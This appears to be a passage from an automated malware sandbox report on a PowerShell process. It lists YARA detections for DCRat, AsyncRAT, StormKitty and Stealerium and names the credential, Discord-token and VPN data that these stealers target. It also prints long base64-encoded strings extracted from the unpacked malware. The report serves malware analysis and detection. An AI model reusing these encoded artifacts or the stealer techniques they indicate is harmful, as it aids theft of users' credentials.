                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: Process Memory Space: powershell.exe PID: 4980, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 5.2.powershell.exe.29df4120000.13.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
                  Source: 5.2.powershell.exe.29dddaa5458.4.raw.unpack, Knvbl.csBase64 encoded string: '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
                  Source: 5.2.powershell.exe.29ddc07a518.7.raw.unpack, Knvbl.csBase64 encoded string: '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
                  Source: 5.2.powershell.exe.29dddab6a18.6.raw.unpack, Knvbl.csBase64 encoded string: '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
                  Source: 5.2.powershell.exe.29dddb632e0.3.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
                  Source: 5.2.powershell.exe.29df4110000.12.raw.unpack, Knvbl.csBase64 encoded string: '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